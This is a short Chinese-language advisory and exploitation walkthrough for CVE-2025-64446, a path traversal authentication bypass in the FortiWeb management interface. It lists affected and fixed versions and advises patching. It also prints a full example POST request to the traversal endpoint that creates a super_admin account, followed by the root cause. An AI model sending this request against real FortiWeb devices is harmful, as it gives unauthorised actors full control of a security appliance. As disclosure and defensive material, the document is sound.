
严重未认证漏洞,允许远程攻击者在 FortiWeb 设备上创建管理员账户。
CVE-2025-64446 是 FortiWeb Web 应用防火墙管理界面中的一个严重相对路径遍历漏洞。
未经认证的远程攻击者可以利用此漏洞绕过认证并创建具有完全权限的新管理员用户,从而导致设备完全失陷。
| 产品 | 受影响版本 | 修复版本 |
|---|---|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 及以上 |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 及以上 |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 及以上 |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 及以上 |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 及以上 |
建议:尽快更新至最新的修复版本。
目标识别
攻击者扫描公开暴露的 FortiWeb 管理界面(通常使用 HTTPS 端口 443 或 8443)。
构造恶意请求
利用的核心是相对路径遍历(../)结合精心构造的 URL,访问内部未认证的 CGI 端点。
易受攻击的端点模式:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
发送利用载荷
攻击者发送单个 POST 请求,携带 JSON 载荷,创建新的管理员账户。
示例利用请求:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
成功利用
如果成功,FortiWeb 将创建新管理员账户,无需任何预先认证。攻击者随后可使用新创建的凭据登录并获得 WAF 的完全控制权。
管理 API 未能正确清洗路径,导致请求能够回溯至旧版 fwbcgi 二进制文件,该文件在某些操作上未强制实施认证。
fwbcgi、../ 或异常的管理员创建尝试仅供教育和防御性安全研究使用。
为网络安全社区精心制作
最后更新:2026年4月